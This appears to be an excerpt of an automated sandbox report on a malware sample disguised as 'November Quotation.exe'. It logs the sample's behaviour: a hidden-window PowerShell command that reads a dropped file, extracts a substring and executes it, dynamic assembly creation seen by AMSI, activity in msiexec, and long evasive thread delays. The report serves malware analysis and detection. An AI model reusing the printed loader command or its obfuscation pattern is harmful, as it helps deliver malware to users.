          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Spunsjernene)), $Haemningsloese).DefineDynamicModule($Ubetnksomt, $false).DefineType($Aquicolous, $Osmoregulatory, [System.MulticastDe
          Source: C:\Users\user\Desktop\November Quotation.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Mendicity=Get-Content -raw 'C:\Users\user\AppData\Local\sognenes\iconograph\Saddelknapperne.Srv';$Umiskendelighed=$Mendicity.SubString(5275,3);.$Umiskendelighed($Mendicity) "
          Source: C:\Users\user\Desktop\November Quotation.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Mendicity=Get-Content -raw 'C:\Users\user\AppData\Local\sognenes\iconograph\Saddelknapperne.Srv';$Umiskendelighed=$Mendicity.SubString(5275,3);.$Umiskendelighed($Mendicity) "Jump to behavior
          Source: C:\Users\user\Desktop\November Quotation.exeCode function: 0_2_0040610B GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0040610B
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_076B8459 push esp; retf 2_2_076B8460
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_076B8609 push ebp; retf 2_2_076B8610
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_076BD8FA push ds; ret 2_2_076BD8FB
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_076BF6AD push ds; retf 2_2_076BF6B3
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08FC5E2A push ebx; retf 2_2_08FC5DFA
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08FC3E13 push edx; ret 2_2_08FC3E1A
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08FCB3F5 push ebx; ret 2_2_08FCB400
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08FC3FD8 push es; iretd 2_2_08FC3FEC
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08FC5DB6 push ebx; retf 2_2_08FC5DFA
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08FC0197 push ebp; iretd 2_2_08FC019D
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08FCD762 push 00000000h; retf 2_2_08FCD765
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_029FE78A push esp; iretd 5_2_029FE791
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_029FE828 pushfd ; iretd 5_2_029FE829
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_029F7BF7 pushfd ; iretd 5_2_029F7BF8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_029F78E6 pushad ; iretd 5_2_029F78E7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_029F7DA7 push esp; iretd 5_2_029F7DA8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_03E9B3F5 push ebx; ret 5_2_03E9B400
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_03E90197 push ebp; iretd 5_2_03E9019D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_03E9D762 push 00000000h; retf 5_2_03E9D765
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_03E93FD8 push es; iretd 5_2_03E93FEC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_03E95E2A push ebx; retf 5_2_03E95DFA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_03E93E13 push edx; ret 5_2_03E93E1A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_03E95DB6 push ebx; retf 5_2_03E95DFA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_26E64172 push esp; ret 5_2_26E64175
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\sognenes\iconograph\Folkways\November Quotation.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Users\user\Desktop\November Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599875Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599766Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599641Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599532Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599407Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599282Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599172Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599063Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598938Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598813Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598688Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598563Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598453Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598344Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598219Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598110Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597985Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597860Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597735Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597610Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597485Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597360Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597245Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597125Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597016Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596903Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596782Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596672Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596557Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596438Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596313Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596188Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596063Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595938Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595828Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595719Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595594Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595485Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595360Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595235Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595110Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594985Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594860Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594735Jump to behavior
